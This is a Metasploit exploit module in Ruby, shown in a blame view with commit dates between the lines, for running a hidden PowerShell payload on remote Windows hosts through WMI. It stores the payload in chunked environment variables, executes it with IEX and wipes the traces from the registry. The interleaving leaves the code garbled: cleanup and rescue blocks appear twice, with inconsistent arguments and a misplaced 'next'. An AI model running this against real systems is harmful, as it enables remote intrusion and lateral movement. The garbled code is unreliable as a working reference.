metasploit-framework/modules/exploits/windows/local/wmi.rb

176 lines
5.6 KiB
Ruby
Raw Normal View History

2013-09-20 12:40:28 +00:00
##
2013-10-30 20:14:16 +00:00
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
2013-09-20 12:40:28 +00:00
##
require 'msf/core'
require 'msf/core/exploit/powershell'
2013-09-20 12:40:28 +00:00
require 'rex'
class Metasploit3 < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Exploit::Powershell
2013-12-14 20:05:51 +00:00
include Msf::Post::Windows::WMIC
2013-09-20 12:40:28 +00:00
def initialize(info={})
super( update_info( info,
2013-09-20 16:18:14 +00:00
'Name' => 'Windows Management Instrumentation (WMI) Remote Command Execution',
2013-09-20 12:40:28 +00:00
'Description' => %q{
2013-09-20 16:18:14 +00:00
This module executes powershell on the remote host using the current
user credentials or those supplied. Instead of using PSEXEC over TCP
port 445 we use the WMIC command to start a Remote Procedure Call on
2013-09-20 17:36:24 +00:00
TCP port 135 and an ephemeral port. Set ReverseListenerComm to tunnel
traffic through that session.
2013-09-20 12:40:28 +00:00
The result is similar to psexec but with the added benefit of using
the session's current authentication token instead of having to know
a password or hash.
2013-09-20 16:18:14 +00:00
We do not get feedback from the WMIC command so there are no
indicators of success or failure. The remote host must be configured
to allow remote Windows Management Instrumentation.
2013-09-20 12:40:28 +00:00
},
'License' => MSF_LICENSE,
'Author' => [
'Ben Campbell'
2013-09-20 12:40:28 +00:00
],
2013-09-20 16:18:14 +00:00
'References' =>
[
2013-09-20 12:40:28 +00:00
[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
[ 'OSVDB', '3106'],
2013-09-20 16:18:14 +00:00
[ 'URL', 'http://passing-the-hash.blogspot.co.uk/2013/07/WMIS-PowerSploit-Shells.html' ],
2013-09-20 12:40:28 +00:00
],
2013-09-20 16:18:14 +00:00
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'WfsDelay' => '15',
},
2013-09-20 12:40:28 +00:00
'DisclosureDate' => 'Jan 01 1999',
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'Targets' =>
[
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
],
'DefaultTarget' => 0
))
register_options([
2013-09-20 16:18:14 +00:00
OptAddressRange.new("RHOSTS", [ true, "Target address range or CIDR identifier" ]),
2013-09-20 17:36:24 +00:00
# Move this out of advanced
OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener'])
2013-09-20 12:40:28 +00:00
])
2013-12-14 20:05:51 +00:00
deregister_options("RHOST")
2013-09-20 12:40:28 +00:00
end
def exploit
2013-09-20 16:18:14 +00:00
if datastore['SMBUser'] and datastore['SMBPass'].nil?
fail_with(Failure::BadConfig, "Need both username and password set.")
end
Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server|
2013-12-14 20:05:51 +00:00
run_host(server)
end
end
2013-09-20 18:33:27 +00:00
2013-12-14 20:05:51 +00:00
def run_host(server)
# Get the PSH Payload and split it into bitesize chunks
# 1024 appears to be the max value allowed in env vars
psh = cmd_psh_payload(payload.encoded,
payload_instance.arch.first,
{
:remove_comspec => true,
:encode_inner_payload => true,
:use_single_quotes => true
})
chunks = split_code(psh, 1000)
2013-12-14 20:05:51 +00:00
begin
print_status("[#{server}] Storing payload in environment variables")
env_name = rand_text_alpha(rand(3)+3)
env_vars = []
0.upto(chunks.length-1) do |i|
env_vars << "#{env_name}#{i}"
c = "cmd /c SETX #{env_vars[i]} \"#{chunks[i]}\" /m"
result = wmic_command(c, server)
unless result
print_error("[#{server}] WMIC command error - skipping host")
return false
2013-09-20 18:33:27 +00:00
end
2013-12-14 20:05:51 +00:00
end
2013-09-20 18:33:27 +00:00
2013-12-14 20:05:51 +00:00
x = rand_text_alpha(rand(3)+3)
exec_cmd = generate_psh_command_line({
:noprofile => true,
:windowstyle => 'hidden',
:command => "$#{x}=''"
})
2013-12-14 20:05:51 +00:00
env_vars.each do |env|
exec_cmd << "+$env:#{env}"
2013-09-20 16:18:14 +00:00
end
2013-12-14 20:05:51 +00:00
exec_cmd << ";IEX $#{x};"
2013-09-20 16:18:14 +00:00
2013-12-14 20:05:51 +00:00
print_status("[#{server}] Executing payload")
result = wmic_command(exec_cmd, server)
2013-09-20 18:33:27 +00:00
2013-12-14 20:05:51 +00:00
if result
if result[:return] == 0
print_good("[#{server}] Process Started PID: #{result[:pid]}")
else
print_error("[#{server}] failed, Return Value: #{result[:return]})")
2013-09-20 18:33:27 +00:00
end
2013-09-20 16:18:14 +00:00
else
2013-12-14 20:05:51 +00:00
print_error("[#{server}] failed...)")
2013-09-20 16:18:14 +00:00
end
print_status("[#{server}] Cleaning up environment variables")
env_vars.each do |env|
cleanup_cmd = "cmd /c REG delete \"HKLM\\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /V #{env} /f"
wmic_command(server, cleanup_cmd)
end
rescue Rex::Post::Meterpreter::RequestError => e
print_error("[#{server}] Error moving on... #{e}")
next
ensure
select(nil,nil,nil,2)
2013-09-20 16:18:14 +00:00
end
end
2013-09-20 16:18:14 +00:00
def wmic_user_pass_string(domain=datastore['SMBDomain'], user=datastore['SMBUser'], pass=datastore['SMBPass'])
userpass = ""
unless user.nil?
if domain.nil?
userpass = "/user:\"#{user}\" /password:\"#{pass}\" "
else
userpass = "/user:\"#{domain}\\#{user}\" /password:\"#{pass}\" "
2013-09-20 12:40:28 +00:00
end
2013-12-14 20:05:51 +00:00
print_status("[#{server}] Cleaning up environment variables")
env_vars.each do |env|
cleanup_cmd = "cmd /c REG delete \"HKLM\\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /V #{env} /f"
wmic_command(cleanup_cmd, server)
end
rescue Rex::Post::Meterpreter::RequestError => e
print_error("[#{server}] Error moving on... #{e}")
return false
end
2013-09-20 16:18:14 +00:00
end
def split_code(psh, chunk_size)
array = []
idx = 0
while (idx < psh.length)
array << psh[idx, chunk_size]
idx += chunk_size
end
return array
2013-09-20 12:40:28 +00:00
end
end